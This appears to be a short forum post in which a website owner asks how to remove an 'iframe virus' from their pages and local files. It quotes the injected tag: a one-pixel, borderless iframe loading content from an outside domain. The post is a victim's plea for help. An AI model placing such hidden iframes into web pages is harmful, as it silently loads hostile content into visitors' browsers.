Please how do I remove the iframe virus?

please I uploaded my files to my website some days ago only to find out that there is an iframe virus on the pages of the website and every time someone wants to go to the site, there is an error message saying the website can harm your computer. abort connection. Please what do I do... this problem also occurs on the computer where I am building the websites locally. please how do I remove the iframe virus <iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe> from my web pages. please help me.
